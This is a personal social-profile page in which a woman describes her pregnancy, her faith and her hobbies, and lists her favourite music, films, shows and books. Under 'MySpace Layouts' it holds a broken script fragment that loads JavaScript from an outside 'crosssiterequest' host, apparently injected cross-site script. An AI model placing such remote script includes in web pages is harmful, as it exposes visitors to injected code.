I am Pregnant and Carrying a wonderful little boy whom is due to be born sometime the end of thi smonth early jan. I am Dedicating this page to my unborn son...He means alot to me even in the womb.. Its a wonderful feeling..I thank God for blessing me with this experience... I have Fallen inlove with him he's my joy and my peace he is my all my everything!!!Now for My Interest Writing: I have written three books as we speak... Dancing: Praise Dance, Jazz, and Hip Hop. Art: Literature, Song, Music, Art Culinary: Baking, Cooking, Food Preparation, And Presentation
The Lord Jesus Christ my heavenly father, the ruler of my soul and my guiding light.
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Classical (Mozart, Beethoven) Slow Jams, Old School, Hip Hop, R&B, Gospel, Jazz, Rock , Country
Drop Dead Fred, Beetlejuice, The Goonies, All the friday movies, Don't be a menance, What women want,Chocolat Mr.and Mrs. Smith, Look Who's Talking, Pirates Of the Carribean 1+2...and so many more
Dating & Relationship Advice
MySpace Layouts.. language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write("..1...{}");}..
Don't watch it often but when I do I watch Current Affair, House, Family Guy, The Simpsons,Adult Swim, and basically any cartoon, I am a cartoon person, Cold Case, Csi, Prison Break, Law and Order
The Coldest Winter Ever, The Catcher In the Rye, Roll of Thunder Hear Me Cry, and Night
My heavenly Father the Lord Jesus Christ,My Father..